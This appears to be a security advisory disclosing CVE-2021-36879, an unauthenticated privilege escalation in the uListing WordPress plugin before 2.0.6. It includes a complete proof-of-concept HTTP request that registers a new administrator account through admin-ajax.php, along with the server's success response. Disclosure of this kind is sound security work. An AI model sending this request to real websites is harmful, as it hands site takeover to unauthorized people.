uListing < 2.0.6 – Unauthenticated Privilege Escalation | CVE 2021-36879

Description

An Unauthenticated Privilege Escalation vulnerability was discovered in the uListing plugin through v2.0.5 for WordPress.

User registration must be allowed on the target website.

Proof of Concept

PoC | Unauthenticated Privilege Escalation | Request:

POST /wp-admin/admin-ajax.php?action=stm_listing_register HTTP/2
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/json;charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 205

{"login":"Visse","first_name":"Visse","last_name":"Visse","email":"poc@email.tld","role":"administrator","password":"admin","password_repeat":"admin","nonce":"ac88e123d8","custom_fields":{}}


PoC | Unauthenticated Privilege Escalation | Response:

{"errors":[],"message":"Registration completed successfully.","status":"success"}